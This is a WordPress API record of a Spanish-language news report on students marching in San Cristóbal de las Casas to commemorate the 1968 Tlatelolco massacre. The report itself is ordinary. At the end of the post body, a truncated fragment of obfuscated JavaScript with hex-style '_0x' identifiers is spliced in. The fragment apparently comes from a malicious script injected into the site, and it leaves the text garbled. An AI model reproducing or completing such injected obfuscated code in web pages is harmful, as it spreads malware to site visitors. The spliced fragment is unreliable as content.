{"id":18167,"date":"2024-10-03T02:34:44","date_gmt":"2024-10-03T02:34:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18167"},"modified":"2024-10-03T02:34:45","modified_gmt":"2024-10-03T02:34:45","slug":"conmemoran-normalistas-la-matanza-de-tlatelolco","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18167","title":{"rendered":"Conmemoran normalistas la matanza de Tlatelolco"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241002-WA0014-1024x768.jpg\" alt=\"\" class=\"wp-image-18168\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241002-WA0014-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241002-WA0014-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241002-WA0014-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241002-WA0014-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241002-WA0014.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Adri\u00e1n P\u00e9rez\/ Corresponsal<\/p>\n\n\n\n<p>2 de octubre del 2024. San Crist\u00f3bal de las Casas.- M\u00e1s de 200 alumnos y alumnas de la Escuela Normal Intercultural Biling\u00fce &#8220;Jacinto Canek&#8221; marcharon hoy por las principales calles de la ciudad para conmemorar el 56 aniversario de la matanza de estudiantes en Tlatelolco, ocurrida en 1968.<\/p>\n\n\n\n<p>La manifestaci\u00f3n inici\u00f3 en el kil\u00f3metro 46 de la carretera de cuota San Crist\u00f3bal-Tuxtla Guti\u00e9rrez, donde los estudiantes bloquearon brevemente el paso vehicular antes de iniciar su caminata. Con pancartas y consignas, recorrieron diversas arterias de la ciudad hasta llegar al Museo San Crist\u00f3bal (Musac), donde realizaron un mitin para expresar su reclamo por justicia.<\/p>\n\n\n\n<p>\u201cEstamos aqu\u00ed manifest\u00e1ndonos para recordar los 56 a\u00f1os de la matanza de estudiantes en la Ciudad de M\u00e9xico. Hasta la fecha no ha habido justicia. Nosotros este d\u00eda estamos manifest\u00e1ndonos en las principales calles de San Crist\u00f3bal para protestar por la muerte de los estudiantes\u201d, se\u00f1alaron.<\/p>\n\n\n\n<p>Durante el recorrido, los estudiantes se detuvieron a un costado de la Unidad Administrativa Municipal, as\u00ed como en el Palacio de Justicia y la Fiscal\u00eda de Justicia Ind\u00edgena, para concluir en el centro hist\u00f3rico, donde no se reportaron incidentes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Adri\u00e1n P\u00e9rez\/ Corresponsal 2 de octubre del 2024. San Crist\u00f3bal de las Casas.- M\u00e1s de 200 alumnos y alumnas de la Escuela Normal Intercultural Biling\u00fce &#8220;Jacinto Canek&#8221; marcharon hoy por las principales calles de la ciudad para conmemorar el 56 aniversario de la matanza de estudiantes en Tlatelolco, ocurrida en 1968. La manifestaci\u00f3n inici\u00f3 en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18168,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-18167","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18167","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18167"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18167\/revisions"}],"predecessor-version":[{"id":18169,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18167\/revisions\/18169"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18168"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18167"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18167"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18167"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}